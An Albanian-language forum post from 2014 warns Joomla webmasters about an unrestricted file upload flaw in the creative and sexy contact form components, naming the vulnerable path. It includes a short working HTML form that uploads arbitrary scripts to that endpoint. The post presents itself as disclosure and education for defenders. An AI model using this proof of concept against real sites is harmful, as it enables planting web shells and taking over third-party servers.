1. Përshëndetje dhe mirësevini në forumin e Itshqip.com
  Nëse akoma nuk jeni pjesë e IT komunitetit më të madhë Shqiptarë nga fusha e Teknologjisë Informative, ju ftojmë që të bëheni pjesë e këtij komuniteti që tani duke u regjistruar këtu - procedura është shumë e thjeshtë dhe e lehtë. Gjithashtu ju mund të regjistroheni edhe përmes rrjetit social Facebook, Twitter, Google+.

Prblemi i fundit te webfaqet Joomla

Tema tek 'Siguria në Ueb' e hapur nga Bahtir, 9 Nëntor 2014.

 1. Bahtir

  Bahtir Anëtar

  Postimet:
  15
  Pëlqimet:
  0
  Pikë nga trofetë:
  3
  Nje problem qe eshte shfaqur se fundmi ne webfaqet joomla qe kan si komponent com_creativecontactform edhe com_sexycontactform duke i leju qfardo perdoruesi qe te bejn upload qfardo lloj skripte ne webfaqe osht tu u shfrytzu shum mire nga hackeret duke perfshi edhe ata shqiptar.

  Problemi osht tek /components/com_creativecontactform/fileupload/index.php

  Mjafton te krijohet nje skript ne ket form :

  <form method="POST" action="http://www.example.com/components/com_creativecontactform/fileupload/index.php"

  enctype="multipart/form-data">

  <input type="file" name="files[]" /><button>Upload</button>

  </form>

  dhe te ekzekutohet kudo dhe qfardo lloj skripte behet upload.

  Jo per qellime sulmi por edukimi dhe mos instalimit te komoponentve te dyshimt nga webmasterat shqiptar.
   

Shpërndaje faqen

Loading...